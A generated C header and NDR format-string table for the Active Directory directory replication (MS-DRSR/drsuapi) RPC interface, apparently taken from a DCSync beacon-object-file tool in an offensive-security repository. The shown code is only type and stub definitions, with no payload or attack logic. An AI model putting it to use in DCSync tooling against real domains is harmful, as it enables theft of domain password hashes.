/* 7696 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 7700 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7702 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7704 */	NdrFcShort( 0x40 ),	/* 64 */
/* 7706 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7708 */	NdrFcShort( 0x10 ),	/* Offset= 16 (7724) */
/* 7710 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 7712 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 7714 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 7716 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 7718 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 7720 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 7722 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 7724 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7726 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7728 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7730 */	NdrFcShort( 0xffa2 ),	/* Offset= -94 (7636) */
/* 7732 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7734 */	NdrFcShort( 0xffb4 ),	/* Offset= -76 (7658) */
/* 7736 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7738 */	NdrFcShort( 0xffc6 ),	/* Offset= -58 (7680) */
/* 7740 */
			0x11, 0x0,	/* FC_RP */
/* 7742 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7744) */
/* 7744 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7746 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7748 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7750 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7752 */	0x0 ,
			0x0,		/* 0 */
/* 7754 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7758 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7762 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7764) */
/* 7764 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7766 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7768 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7772 */	NdrFcShort( 0x1a ),	/* Offset= 26 (7798) */
/* 7774 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7773) */
/* 7776 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7778 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7780 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7782 */	NdrFcShort( 0x4 ),	/* 4 */
/* 7784 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7786 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7788 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7792 */	NdrFcLong( 0x400 ),	/* 1024 */
/* 7796 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7798 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7800 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7802 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7804 */	NdrFcShort( 0x6 ),	/* Offset= 6 (7810) */
/* 7806 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 7808 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7810 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7812 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (7776) */
/* 7814 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7816 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7818) */
/* 7818 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7820 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7822 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7824 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7826 */	0x0 ,
			0x0,		/* 0 */
/* 7828 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7832 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7836 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7838) */
/* 7838 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7840 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7842 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7846 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7850) */
/* 7848 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7847) */
/* 7850 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7852 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7854 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7856 */	NdrFcShort( 0x6 ),	/* Offset= 6 (7862) */
/* 7858 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 7860 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7862 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7864 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */

			0x0
        }
    };


================================================
FILE: AD-BOF/DCSync-BOF/drsuapi/ms-drsr.h
================================================


/* Compiler settings for ms-drsr.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0628 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */

#ifndef MS_DSRS_H
#define MS_DSRS_H
#endif


/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */


#ifndef __ms2Ddrsr_h__
#define __ms2Ddrsr_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#ifndef DECLSPEC_XFGVIRT
#if defined(_CONTROL_FLOW_GUARD_XFG)
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 


#ifndef __drsuapi_INTERFACE_DEFINED__
#define __drsuapi_INTERFACE_DEFINED__

/* interface drsuapi */
/* [unique][version][uuid] */ 

// Define RPC_UNICODE_STRING since we are not including ms-dtyp.h
typedef struct _RPC_UNICODE_STRING {
    unsigned short Length;
    unsigned short MaximumLength;
    WCHAR *Buffer;
} RPC_UNICODE_STRING;

typedef LONGLONG DSTIME;

typedef /* [context_handle] */ void *DRS_HANDLE;

typedef /*  */ struct __MIDL_drsuapi_0001
    {
    unsigned char Data[ 28 ];
    } 	NT4SID;

typedef /*  */ struct __MIDL_drsuapi_0002
    {
    unsigned long structLen;
    unsigned long SidLen;
    GUID Guid;
    NT4SID Sid;
    unsigned long NameLen;
    /* [size_is][range] */ WCHAR StringName[ 1 ];
    } 	DSNAME;

typedef LONGLONG USN;

typedef /*  */ struct __MIDL_drsuapi_0003
    {
    USN usnHighObjUpdate;
    USN usnReserved;
    USN usnHighPropUpdate;
    } 	USN_VECTOR;

typedef /*  */ struct __MIDL_drsuapi_0004
    {
    UUID uuidDsa;
    USN usnHighPropUpdate;
    } 	UPTODATE_CURSOR_V1;

typedef /*  */ struct __MIDL_drsuapi_0005
    {
    DWORD dwVersion;
    DWORD dwReserved1;
    /* [range] */ DWORD cNumCursors;
    DWORD dwReserved2;
    /* [size_is] */ UPTODATE_CURSOR_V1 rgCursors[ 1 ];
    } 	UPTODATE_VECTOR_V1_EXT;

typedef /*  */ struct __MIDL_drsuapi_0006
    {
    /* [range] */ unsigned int length;
    /* [size_is] */ BYTE *elements;
    } 	OID_t;

typedef /*  */ struct __MIDL_drsuapi_0007
    {
    unsigned long ndx;
    OID_t prefix;
    } 	PrefixTableEntry;

typedef /*  */ struct __MIDL_drsuapi_0008
    {
    /* [range] */ DWORD PrefixCount;
    /* [size_is] */ PrefixTableEntry *pPrefixEntry;
    } 	SCHEMA_PREFIX_TABLE;

typedef ULONG ATTRTYP;

typedef /*  */ struct __MIDL_drsuapi_0009
    {
    DWORD dwVersion;
    DWORD dwReserved1;
    /* [range] */ DWORD cAttrs;
    /* [size_is] */ ATTRTYP rgPartialAttr[ 1 ];
    } 	PARTIAL_ATTR_VECTOR_V1_EXT;

typedef /*  */ struct __MIDL_drsuapi_0010
    {
    /* [range] */ unsigned long mtx_namelen;
    /* [size_is] */ unsigned char mtx_name[ 1 ];
    } 	MTX_ADDR;

typedef /*  */ struct __MIDL_drsuapi_0011
    {
    /* [range] */ ULONG valLen;
    /* [size_is] */ UCHAR *pVal;
    } 	ATTRVAL;

typedef /*  */ struct __MIDL_drsuapi_0012
    {
    /* [range] */ ULONG valCount;
    /* [size_is] */ ATTRVAL *pAVal;
    } 	ATTRVALBLOCK;

typedef /*  */ struct __MIDL_drsuapi_0013
    {
    ATTRTYP attrTyp;
    ATTRVALBLOCK AttrVal;
    } 	ATTR;

typedef /*  */ struct __MIDL_drsuapi_0014
    {
    /* [range] */ ULONG attrCount;
    /* [size_is] */ ATTR *pAttr;
    } 	ATTRBLOCK;

typedef /*  */ struct __MIDL_drsuapi_0015
    {
    DSNAME *pName;
    unsigned long ulFlags;
    ATTRBLOCK AttrBlock;
    } 	ENTINF;

typedef /*  */ struct __MIDL_drsuapi_0016
    {
    DWORD dwVersion;
    DSTIME timeChanged;
    UUID uuidDsaOriginating;
    USN usnOriginating;
    } 	PROPERTY_META_DATA_EXT;

typedef /*  */ struct __MIDL_drsuapi_0017
    {
    /* [range] */ DWORD cNumProps;
    /* [size_is] */ PROPERTY_META_DATA_EXT rgMetaData[ 1 ];
    } 	PROPERTY_META_DATA_EXT_VECTOR;

typedef struct REPLENTINFLIST
    {
    struct REPLENTINFLIST *pNextEntInf;
    ENTINF Entinf;
    BOOL fIsNCPrefix;
    UUID *pParentGuid;
    PROPERTY_META_DATA_EXT_VECTOR *pMetaDataExt;
    } 	REPLENTINFLIST;

typedef /*  */ struct __MIDL_drsuapi_0018
    {
    UUID uuidDsa;
    USN usnHighPropUpdate;
    DSTIME timeLastSyncSuccess;
    } 	UPTODATE_CURSOR_V2;

typedef /*  */ struct __MIDL_drsuapi_0019
    {
    DWORD dwVersion;
    DWORD dwReserved1;
    /* [range] */ DWORD cNumCursors;
    DWORD dwReserved2;
    /* [size_is] */ UPTODATE_CURSOR_V2 rgCursors[ 1 ];
    } 	UPTODATE_VECTOR_V2_EXT;

typedef /*  */ struct __MIDL_drsuapi_0020
    {
    DSTIME timeCreated;
    PROPERTY_META_DATA_EXT MetaData;
    } 	VALUE_META_DATA_EXT_V1;

typedef /*  */ struct __MIDL_drsuapi_0021
    {
    DSTIME timeCreated;
    PROPERTY_META_DATA_EXT MetaData;
    DWORD unused1;
    DWORD unused2;
    DWORD unused3;
    DSTIME timeExpired;
    } 	VALUE_META_DATA_EXT_V3;

typedef /*  */ struct __MIDL_drsuapi_0022
    {
    DSNAME *pObject;
    ATTRTYP attrTyp;
    ATTRVAL Aval;
    BOOL fIsPresent;
    VALUE_META_DATA_EXT_V1 MetaData;
    } 	REPLVALINF_V1;

typedef /*  */ struct __MIDL_drsuapi_0023
    {
    DSNAME *pObject;
    ATTRTYP attrTyp;
    ATTRVAL Aval;
    BOOL fIsPresent;
    VALUE_META_DATA_EXT_V3 MetaData;
    } 	REPLVALINF_V3;

typedef /*  */ struct __MIDL_drsuapi_0024
    {
    UCHAR rgTimes[ 84 ];
    } 	REPLTIMES;

typedef /*  */ struct __MIDL_drsuapi_0025
    {
    DWORD status;
    /* [unique][string] */ WCHAR *pDomain;
    /* [unique][string] */ WCHAR *pName;
    } 	DS_NAME_RESULT_ITEMW;

typedef struct __MIDL_drsuapi_0025 *PDS_NAME_RESULT_ITEMW;

typedef /*  */ struct __MIDL_drsuapi_0026
    {
    DWORD cItems;
    /* [size_is] */ PDS_NAME_RESULT_ITEMW rItems;
    } 	DS_NAME_RESULTW;

typedef struct __MIDL_drsuapi_0026 *PDS_NAME_RESULTW;

typedef /*  */ struct __MIDL_drsuapi_0027
    {
    /* [unique][string] */ WCHAR *NetbiosName;
    /* [unique][string] */ WCHAR *DnsHostName;
    /* [unique][string] */ WCHAR *SiteName;
    /* [unique][string] */ WCHAR *ComputerObjectName;
    /* [unique][string] */ WCHAR *ServerObjectName;
    BOOL fIsPdc;
    BOOL fDsEnabled;
    } 	DS_DOMAIN_CONTROLLER_INFO_1W;

typedef /*  */ struct __MIDL_drsuapi_0028
    {
    /* [unique][string] */ WCHAR *NetbiosName;
    /* [unique][string] */ WCHAR *DnsHostName;
    /* [unique][string] */ WCHAR *SiteName;
    /* [unique][string] */ WCHAR *SiteObjectName;
    /* [unique][string] */ WCHAR *ComputerObjectName;
    /* [unique][string] */ WCHAR *ServerObjectName;
    /* [unique][string] */ WCHAR *NtdsDsaObjectName;
    BOOL fIsPdc;
    BOOL fDsEnabled;
    BOOL fIsGc;
    GUID SiteObjectGuid;
    GUID ComputerObjectGuid;
    GUID ServerObjectGuid;
    GUID NtdsDsaObjectGuid;
    } 	DS_DOMAIN_CONTROLLER_INFO_2W;

typedef /*  */ struct __MIDL_drsuapi_0029
    {
    /* [unique][string] */ WCHAR *NetbiosName;
    /* [unique][string] */ WCHAR *DnsHostName;
    /* [unique][string] */ WCHAR *SiteName;
    /* [unique][string] */ WCHAR *SiteObjectName;
    /* [unique][string] */ WCHAR *ComputerObjectName;
    /* [unique][string] */ WCHAR *ServerObjectName;
    /* [unique][string] */ WCHAR *NtdsDsaObjectName;
    BOOL fIsPdc;
    BOOL fDsEnabled;
    BOOL fIsGc;
    BOOL fIsRodc;
    GUID SiteObjectGuid;
    GUID ComputerObjectGuid;
    GUID ServerObjectGuid;
    GUID NtdsDsaObjectGuid;
    } 	DS_DOMAIN_CONTROLLER_INFO_3W;

typedef /*  */ struct __MIDL_drsuapi_0030
    {
    DWORD IPAddress;
    DWORD NotificationCount;
    DWORD secTimeConnected;
    DWORD Flags;
    DWORD TotalRequests;
    DWORD Reserved1;
    /* [unique][string] */ WCHAR *UserName;
    } 	DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW;

typedef struct ENTINFLIST
    {
    struct ENTINFLIST *pNextEntInf;
    ENTINF Entinf;
    } 	ENTINFLIST;

typedef /*  */ struct __MIDL_drsuapi_0031
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    ATTRTYP type;
    BOOL valReturned;
    ATTRVAL Val;
    } 	INTFORMPROB_DRS_WIRE_V1;

typedef struct _PROBLEMLIST_DRS_WIRE_V1
    {
    struct _PROBLEMLIST_DRS_WIRE_V1 *pNextProblem;
    INTFORMPROB_DRS_WIRE_V1 intprob;
    } 	PROBLEMLIST_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0032
    {
    DSNAME *pObject;
    ULONG count;
    PROBLEMLIST_DRS_WIRE_V1 FirstProblem;
    } 	ATRERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0033
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    DSNAME *pMatched;
    } 	NAMERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0034
    {
    UCHAR nameRes;
    UCHAR unusedPad;
    USHORT nextRDN;
    } 	NAMERESOP_DRS_WIRE_V1;

typedef struct _DSA_ADDRESS_LIST_DRS_WIRE_V1
    {
    struct _DSA_ADDRESS_LIST_DRS_WIRE_V1 *pNextAddress;
    RPC_UNICODE_STRING *pAddress;
    } 	DSA_ADDRESS_LIST_DRS_WIRE_V1;

typedef struct CONTREF_DRS_WIRE_V1
    {
    DSNAME *pTarget;
    NAMERESOP_DRS_WIRE_V1 OpState;
    USHORT aliasRDN;
    USHORT RDNsInternal;
    USHORT refType;
    USHORT count;
    DSA_ADDRESS_LIST_DRS_WIRE_V1 *pDAL;
    struct CONTREF_DRS_WIRE_V1 *pNextContRef;
    BOOL bNewChoice;
    UCHAR choice;
    } 	CONTREF_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0035
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    CONTREF_DRS_WIRE_V1 Refer;
    } 	REFERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0036
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    } 	SECERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0037
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    } 	SVCERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0038
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    } 	UPDERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0039
    {
    DWORD dsid;
    DWORD extendedErr;
    DWORD extendedData;
    USHORT problem;
    } 	SYSERR_DRS_WIRE_V1;

typedef /* [switch_type] */ union __MIDL_drsuapi_0040
    {
    /* [case()] */ ATRERR_DRS_WIRE_V1 AtrErr;
    /* [case()] */ NAMERR_DRS_WIRE_V1 NamErr;
    /* [case()] */ REFERR_DRS_WIRE_V1 RefErr;
    /* [case()] */ SECERR_DRS_WIRE_V1 SecErr;
    /* [case()] */ SVCERR_DRS_WIRE_V1 SvcErr;
    /* [case()] */ UPDERR_DRS_WIRE_V1 UpdErr;
    /* [case()] */ SYSERR_DRS_WIRE_V1 SysErr;
    } 	DIRERR_DRS_WIRE_V1;

typedef /*  */ struct __MIDL_drsuapi_0041
    {
    /* [string] */ LPWSTR pszNamingContext;
    /* [string] */ LPWSTR pszSourceDsaDN;
    /* [string] */ LPWSTR pszSourceDsaAddress;
    /* [string] */ LPWSTR pszAsyncIntersiteTransportDN;
    DWORD dwReplicaFlags;
    DWORD dwReserved;
    UUID uuidNamingContextObjGuid;
    UUID uuidSourceDsaObjGuid;
    UUID uuidSourceDsaInvocationID;
    UUID uuidAsyncIntersiteTransportObjGuid;
    USN usnLastObjChangeSynced;
    USN usnAttributeFilter;
    FILETIME ftimeLastSyncSuccess;
    FILETIME ftimeLastSyncAttempt;
    DWORD dwLastSyncResult;
    DWORD cNumConsecutiveSyncFailures;
    } 	DS_REPL_NEIGHBORW;

typedef /*  */ struct __MIDL_drsuapi_0042
    {
    DWORD cNumNeighbors;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_NEIGHBORW rgNeighbor[ 1 ];
    } 	DS_REPL_NEIGHBORSW;

typedef /*  */ struct __MIDL_drsuapi_0043
    {
    UUID uuidSourceDsaInvocationID;
    USN usnAttributeFilter;
    } 	DS_REPL_CURSOR;

typedef /*  */ struct __MIDL_drsuapi_0044
    {
    DWORD cNumCursors;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_CURSOR rgCursor[ 1 ];
    } 	DS_REPL_CURSORS;

typedef /*  */ struct __MIDL_drsuapi_0045
    {
    /* [string] */ LPWSTR pszAttributeName;
    DWORD dwVersion;
    FILETIME ftimeLastOriginatingChange;
    UUID uuidLastOriginatingDsaInvocationID;
    USN usnOriginatingChange;
    USN usnLocalChange;
    } 	DS_REPL_ATTR_META_DATA;

typedef /*  */ struct __MIDL_drsuapi_0046
    {
    /* [string] */ LPWSTR pszDsaDN;
    UUID uuidDsaObjGuid;
    FILETIME ftimeFirstFailure;
    DWORD cNumFailures;
    DWORD dwLastResult;
    } 	DS_REPL_KCC_DSA_FAILUREW;

typedef /*  */ struct __MIDL_drsuapi_0047
    {
    DWORD cNumEntries;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_KCC_DSA_FAILUREW rgDsaFailure[ 1 ];
    } 	DS_REPL_KCC_DSA_FAILURESW;

typedef /*  */ struct __MIDL_drsuapi_0048
    {
    DWORD cNumEntries;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_ATTR_META_DATA rgMetaData[ 1 ];
    } 	DS_REPL_OBJ_META_DATA;

typedef /*  */ 
enum __MIDL_drsuapi_0049
    {
        DS_REPL_OP_TYPE_SYNC	= 0,
        DS_REPL_OP_TYPE_ADD	= ( DS_REPL_OP_TYPE_SYNC + 1 ) ,
        DS_REPL_OP_TYPE_DELETE	= ( DS_REPL_OP_TYPE_ADD + 1 ) ,
        DS_REPL_OP_TYPE_MODIFY	= ( DS_REPL_OP_TYPE_DELETE + 1 ) ,
        DS_REPL_OP_TYPE_UPDATE_REFS	= ( DS_REPL_OP_TYPE_MODIFY + 1 ) 
    } 	DS_REPL_OP_TYPE;

typedef /*  */ struct __MIDL_drsuapi_0050
    {
    FILETIME ftimeEnqueued;
    ULONG ulSerialNumber;
    ULONG ulPriority;
    DS_REPL_OP_TYPE OpType;
    ULONG ulOptions;
    /* [string] */ LPWSTR pszNamingContext;
    /* [string] */ LPWSTR pszDsaDN;
    /* [string] */ LPWSTR pszDsaAddress;
    UUID uuidNamingContextObjGuid;
    UUID uuidDsaObjGuid;
    } 	DS_REPL_OPW;

typedef /*  */ struct __MIDL_drsuapi_0051
    {
    FILETIME ftimeCurrentOpStarted;
    DWORD cNumPendingOps;
    /* [size_is] */ DS_REPL_OPW rgPendingOp[ 1 ];
    } 	DS_REPL_PENDING_OPSW;

typedef /*  */ struct __MIDL_drsuapi_0052
    {
    /* [string] */ LPWSTR pszAttributeName;
    /* [string] */ LPWSTR pszObjectDn;
    DWORD cbData;
    /* [full][size_is] */ BYTE *pbData;
    FILETIME ftimeDeleted;
    FILETIME ftimeCreated;
    DWORD dwVersion;
    FILETIME ftimeLastOriginatingChange;
    UUID uuidLastOriginatingDsaInvocationID;
    USN usnOriginatingChange;
    USN usnLocalChange;
    } 	DS_REPL_VALUE_META_DATA;

typedef /*  */ struct __MIDL_drsuapi_0053
    {
    DWORD cNumEntries;
    DWORD dwEnumerationContext;
    /* [size_is] */ DS_REPL_VALUE_META_DATA rgMetaData[ 1 ];
    } 	DS_REPL_ATTR_VALUE_META_DATA;

typedef /*  */ struct __MIDL_drsuapi_0054
    {
    UUID uuidSourceDsaInvocationID;
    USN usnAttributeFilter;
    FILETIME ftimeLastSyncSuccess;
    } 	DS_REPL_CURSOR_2;

typedef /*  */ struct __MIDL_drsuapi_0055
    {
    DWORD cNumCursors;
    DWORD dwEnumerationContext;
    /* [size_is] */ DS_REPL_CURSOR_2 rgCursor[ 1 ];
    } 	DS_REPL_CURSORS_2;

typedef /*  */ struct __MIDL_drsuapi_0056
    {
    UUID uuidSourceDsaInvocationID;
    USN usnAttributeFilter;
    FILETIME ftimeLastSyncSuccess;
    /* [string] */ LPWSTR pszSourceDsaDN;
    } 	DS_REPL_CURSOR_3W;

typedef /*  */ struct __MIDL_drsuapi_0057
    {
    DWORD cNumCursors;
    DWORD dwEnumerationContext;
    /* [size_is] */ DS_REPL_CURSOR_3W rgCursor[ 1 ];
    } 	DS_REPL_CURSORS_3W;

typedef /*  */ struct __MIDL_drsuapi_0058
    {
    /* [string] */ LPWSTR pszAttributeName;
    DWORD dwVersion;
    FILETIME ftimeLastOriginatingChange;
    UUID uuidLastOriginatingDsaInvocationID;
    USN usnOriginatingChange;
    USN usnLocalChange;
    /* [string] */ LPWSTR pszLastOriginatingDsaDN;
    } 	DS_REPL_ATTR_META_DATA_2;

typedef /*  */ struct __MIDL_drsuapi_0059
    {
    DWORD cNumEntries;
    DWORD dwReserved;
    /* [size_is] */ DS_REPL_ATTR_META_DATA_2 rgMetaData[ 1 ];
    } 	DS_REPL_OBJ_META_DATA_2;

typedef /*  */ struct __MIDL_drsuapi_0060
    {
    /* [string] */ LPWSTR pszAttributeName;
    /* [string] */ LPWSTR pszObjectDn;
    DWORD cbData;
    /* [full][size_is] */ BYTE *pbData;
    FILETIME ftimeDeleted;
    FILETIME ftimeCreated;
    DWORD dwVersion;
    FILETIME ftimeLastOriginatingChange;
    UUID uuidLastOriginatingDsaInvocationID;
    USN usnOriginatingChange;
    USN usnLocalChange;
    /* [string] */ LPWSTR pszLastOriginatingDsaDN;
    } 	DS_REPL_VALUE_META_DATA_2;

typedef /*  */ struct __MIDL_drsuapi_0061
    {
    DWORD cNumEntries;
    DWORD dwEnumerationContext;
    /* [size_is] */ DS_REPL_VALUE_META_DATA_2 rgMetaData[ 1 ];
    } 	DS_REPL_ATTR_VALUE_META_DATA_2;

typedef /*  */ struct __MIDL_drsuapi_0062
    {
    /* [range] */ DWORD cb;
    /* [size_is] */ BYTE rgb[ 1 ];
    } 	DRS_EXTENSIONS;

typedef /*  */ struct __MIDL_drsuapi_0063
    {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    /* [ref] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrVecDestV1;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    } 	DRS_MSG_GETCHGREQ_V3;

typedef /*  */ struct __MIDL_drsuapi_0064
    {
    UUID uuidTransportObj;
    /* [ref] */ MTX_ADDR *pmtxReturnAddress;
    DRS_MSG_GETCHGREQ_V3 V3;
    } 	DRS_MSG_GETCHGREQ_V4;

typedef /*  */ struct __MIDL_drsuapi_0065
    {
    UUID uuidTransportObj;
    /* [ref] */ MTX_ADDR *pmtxReturnAddress;
    DRS_MSG_GETCHGREQ_V3 V3;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    /* [unique] */ PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
    } 	DRS_MSG_GETCHGREQ_V7;

typedef /*  */ struct __MIDL_drsuapi_0066
    {
    UUID uuidDsaObjSrc;
    UUID uuidInvocIdSrc;
    /* [unique] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    USN_VECTOR usnvecTo;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecSrcV1;
    SCHEMA_PREFIX_TABLE PrefixTableSrc;
    ULONG ulExtendedRet;
    ULONG cNumObjects;
    ULONG cNumBytes;
    /* [unique] */ REPLENTINFLIST *pObjects;
    BOOL fMoreData;
    } 	DRS_MSG_GETCHGREPLY_V1;

typedef /*  */ struct __MIDL_drsuapi_0067
    {
    UUID uuidDsaObjSrc;
    UUID uuidInvocIdSrc;
    /* [unique] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    USN_VECTOR usnvecTo;
    /* [unique] */ UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
    SCHEMA_PREFIX_TABLE PrefixTableSrc;
    ULONG ulExtendedRet;
    ULONG cNumObjects;
    ULONG cNumBytes;
    /* [unique] */ REPLENTINFLIST *pObjects;
    BOOL fMoreData;
    ULONG cNumNcSizeObjects;
    ULONG cNumNcSizeValues;
    /* [range] */ DWORD cNumValues;
    /* [size_is] */ REPLVALINF_V1 *rgValues;
    DWORD dwDRSError;
    } 	DRS_MSG_GETCHGREPLY_V6;

typedef /*  */ struct __MIDL_drsuapi_0068
    {
    UUID uuidDsaObjSrc;
    UUID uuidInvocIdSrc;
    /* [unique] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    USN_VECTOR usnvecTo;
    /* [unique] */ UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
    SCHEMA_PREFIX_TABLE PrefixTableSrc;
    ULONG ulExtendedRet;
    ULONG cNumObjects;
    ULONG cNumBytes;
    /* [unique] */ REPLENTINFLIST *pObjects;
    BOOL fMoreData;
    ULONG cNumNcSizeObjects;
    ULONG cNumNcSizeValues;
    /* [range] */ DWORD cNumValues;
    /* [size_is] */ REPLVALINF_V3 *rgValues;
    DWORD dwDRSError;
    } 	DRS_MSG_GETCHGREPLY_V9;

typedef /*  */ struct __MIDL_drsuapi_0069
    {
    DWORD cbUncompressedSize;
    DWORD cbCompressedSize;
    /* [size_is] */ BYTE *pbCompressedData;
    } 	DRS_COMPRESSED_BLOB;

typedef /*  */ struct __MIDL_drsuapi_0070
    {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    /* [ref] */ DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    /* [unique] */ UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    ULARGE_INTEGER liFsmoInfo;
    } 	DRS_MSG_GETCHGREQ_V5;

